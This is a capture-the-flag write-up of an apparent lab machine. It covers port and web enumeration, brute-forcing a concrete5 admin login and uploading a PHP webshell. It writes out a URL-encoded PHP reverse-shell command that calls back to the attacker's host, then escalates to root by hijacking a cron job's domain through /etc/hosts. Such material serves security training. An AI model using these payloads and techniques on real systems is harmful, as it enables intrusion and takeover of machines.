Target IP: 10.10.195.160
Challenge Description: Try to root the machine!
To begin the challenge, I performed a TCP port scan against the target machine using the command sudo nmap -sS 10.10.195.160 -p- and obtained the result shown above. By the looks of it there is only one TCP port open on the target machine: port 85.
I performed an aggressive TCP port scan using the command sudo nmap -sV -A 10.10.195.160 -p 85 and obtained the result shown above. By the looks of it, the target machine seems to be running HTTP on port 85. I performed a subdomain enumeration but I did not find anything useful. Time to enumerate this port further.
Port 85: HTTP
I performed a scan against the web server on port 85 using the command nikto -h http://10.10.195.160:85 and obtained the result shown above. The scan successfully identified the interesting result shown above. There is an interesting directory with the name /app. Time to performed a directory search to identify any other useful directories.
Running a directory search using the command gobuster dir -u http://10.10.195.160:85 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt also successfully identified the /app directory.
Browsing to http://10.10.195.160:85/ returns the webpage shown above. Scanning the source-code of the webpage did not result in anything useful either. Time to visit the /app directory now.
Browsing to /app directory returns the webpage shown above. This webpage has one button with the text JUMP.
<button onclick="buttonClick()">JUMP</button>
<script>
function buttonClick() {
alert("Make yourself confortable and enjoy my place.");
window.location.href = 'castle';
}
</script><button onclick="buttonClick()">JUMP</button>
<script>
function buttonClick() {
alert("Make yourself confortable and enjoy my place.");
window.location.href = 'castle';
}
</script>Viewing the source-code of the /app webpage contains the script shown above. Pressing the JUMP button seems to execute the script above. It seems to redirect to /castle.
I pressed the button from the previous image and the webpage above was returned to me. After some manual enumeration, I found possible usernames such as toad, toadette, etc.
Viewing the source-code of the webpage, I managed to obtain the application name and version concrete5 - 8.5.2 as shown above. Is the web application vulnerable? Time to find out.
I did a Google search for concrete5 8.5.2 vulnerabilities and found the webpage shown above. This application version is vulnerable to RCE by the looks of it. However, I will require admin privileges to perform RCE. This website also contains the steps on how to compromise this web application after obtaining an admin access. Maybe I can reproduce the steps after gaining admin credentials?
I found the login webpage. However, I sprayed default credentials such as admin:admin and admin:root, but I had no luck. Time to bruteforce the logins. I fired-up Burpsuite on my machine and intercepted a login request.
I tried to bruteforce the password of the user admin and got a hit using the Intruder tool and its sniper attack. The only change I made is to the password field. I used the password file 10-million-password-list-top-1000.txt. And I successfully obtained the credentials admin:password, as shown above.
And bingo! Now I have admin access on the web application using the credentials admin:password. Now I can use the website I found earlier and follow the steps to upload a reverse shell.
Owning the Web Application: Webshell Upload via File Upload Attack
The steps to reproduce to gain an RCE on the target machine are shown above.
I inserted php inside the Allow File Types list, as shown above.
On my machine, I created a simple PHP webshell with the name shell.php. The content of this PHP webshell is shown above. Time to upload my PHP webshell using the File Manager on the target machine now.
I uploaded my PHP webshell as shown above. However, I will need to find the location of this script so I can perform RCE. I right-clicked on the shell.php file and then Properties.
Foothold: RCE via Webshell & Reverse Shell Connection
I notice my webshell is being served at http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php. Time to visit this URL to perform RCE. And perfect! Now I can perform RCE. I managed to successfully execute the commands ls;whoami;id and obtained the result shown above. Time to obtain a reverse shell connection now. I started a listener on my machine at port 8443 first.
Then using my PHP webshell, I deployed the reverse shell command php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and obtained a reverse shell connection at port 8443. The full URL with the reverse shell payload is http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. Now I have a foothold on the target machine as the user www-data. Time to elevate my privileges to obtain a root shell :)
Horizontal Privilege Escalation: www-data to Mario
On the target machine, I notice there are two users: toad and mario. After some manual enumeration, I found an interesting filename called database.php which contains the password toadisthebest. This password seems to belong to the user toad too. Can I switch user using this new password?
And bingo! I ran the command su toad and the password toadisthebest and got a hit. I managed to successfully elevate my privileges to the user toad from www-data, as shown above.
Running the command env to list all environmental configs seems to contain an interesting entry with the name PWD_token and the value aWthVGVOVEFOdEVTCg==, as shown above. I can use Cyberchef to decode this. After decoding it, I obtained the string ikaTeNTANtES. Does this password belong to the user mario? Time to find out.
And bingo! The password belongs to the user mario, as shown above. I was able to successfully switch to this user.
Vertical Privilege Escalation: Mario to Root via Domain Hijacking & Cronjob Execution
I transferred pspy64 to the target machine and executed it. After waiting for some time, I obtained the interesting output shown above. The command /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh looks the most interesting to me, as it seems to be executing the script counter.sh located at /app/castle/application/ on the domain name mkingdom.thm:85. The attack vector I can use is domain hijacking. This is possible by editing the /etc/hosts to point to my machine. And then creating & serving a malicious reverse shell script with the name counter.sh at /app/castle/application/ on my machine at port 85.
On my machine, I created the same directory and the malicious script with the name counter.sh as shown above. Then I started a Python HTTP server at port 85 by using the command python3 -m http.server 85. Time to edit the /etc/hosts file on the target machine and insert my machine's IP address for the domain name mkingdom.thm.
I made changes as shown above to the /etc/hosts file using nano on the target machine. The entry above contains my IP address for the domain name mkingdom.thm. Then I started a listener on my machine at port 8444.
And bingo. I waited for some time, and then I obtained a root shell on port 8444, as shown above.
The two flags are shown above. I had to read the flags using the tail command, as cat did not work. GG.